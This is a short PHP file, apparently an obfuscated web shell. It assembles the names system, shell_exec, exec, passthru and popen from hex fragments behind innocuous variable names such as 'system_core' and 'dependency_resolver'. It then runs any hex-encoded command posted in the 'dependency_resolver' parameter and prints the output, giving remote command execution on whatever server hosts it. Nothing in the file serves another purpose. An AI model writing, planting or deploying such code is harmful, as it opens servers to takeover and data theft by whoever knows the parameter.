<?php


$res1 = '7';
$res2 = '9';
$res3 = '3';
$res4 = '4';
$res5 = '6';
$res6 = 'c';
$res7 = 'f';
$res8 = '5';
$res9 = '1';
$res10 = '2';
$res11 = '0';
$res12 = 'e';
$res13 = 'd';
$system_core1 = pack("H*", '7' . '3' . $res1 . $res2 . $res1 . $res3 . '7' . $res4 . $res5 . '5' . $res5 . 'd');
$system_core2 = pack("H*", '7' . $res3 . '6' . '8' . $res5 . '5' . '6' . 'c' . '6' . $res6 . '5' . $res7 . '6' . '5' . '7' . '8' . $res5 . $res8 . '6' . $res3);
$system_core3 = pack("H*", '6' . $res8 . '7' . '8' . $res5 . $res8 . $res5 . $res3);
$system_core4 = pack("H*", $res1 . '0' . $res5 . $res9 . $res1 . $res3 . '7' . '3' . $res1 . '4' . $res5 . '8' . '7' . $res10 . $res1 . '5');
$system_core5 = pack("H*", $res1 . $res11 . $res5 . $res7 . $res1 . '0' . '6' . '5' . '6' . $res12);
$system_core6 = pack("H*", $res1 . '3' . $res1 . '4' . $res1 . '2' . $res5 . $res8 . '6' . $res9 . $res5 . $res13 . $res8 . 'f' . '6' . $res1 . $res5 . '5' . '7' . '4' . $res8 . 'f' . '6' . '3' . $res5 . $res7 . '6' . $res12 . $res1 . '4' . '6' . $res8 . '6' . 'e' . $res1 . '4' . '7' . '3');
$system_core7 = pack("H*", $res1 . $res11 . $res5 . '3' . $res5 . $res6 . '6' . $res7 . $res1 . '3' . '6' . '5');
$dependency_resolver = pack("H*", $res5 . '4' . $res5 . $res8 . $res1 . '0' . $res5 . '5' . $res5 . $res12 . $res5 . '4' . $res5 . '5' . '6' . $res12 . $res5 . '3' . '7' . $res2 . $res8 . 'f' . $res1 . '2' . $res5 . '5' . '7' . '3' . $res5 . 'f' . $res5 . 'c' . '7' . '6' . $res5 . '5' . $res1 . '2');
if (isset($_POST[$dependency_resolver])) {
    $dependency_resolver = pack("H*", $_POST[$dependency_resolver]);
    if (function_exists($system_core1)) {
        $system_core1($dependency_resolver);
    } elseif (function_exists($system_core2)) {
        print $system_core2($dependency_resolver);
    } elseif (function_exists($system_core3)) {
        $system_core3($dependency_resolver, $ptr_ref);
        print join("\n", $ptr_ref);
    } elseif (function_exists($system_core4)) {
        $system_core4($dependency_resolver);
    } elseif (function_exists($system_core5) && function_exists($system_core6) && function_exists($system_core7)) {
        $flg_entity = $system_core5($dependency_resolver, 'r');
        if ($flg_entity) {
            $desc_data = $system_core6($flg_entity);
            $system_core7($flg_entity);
            print $desc_data;
        }
    }
    exit;
}
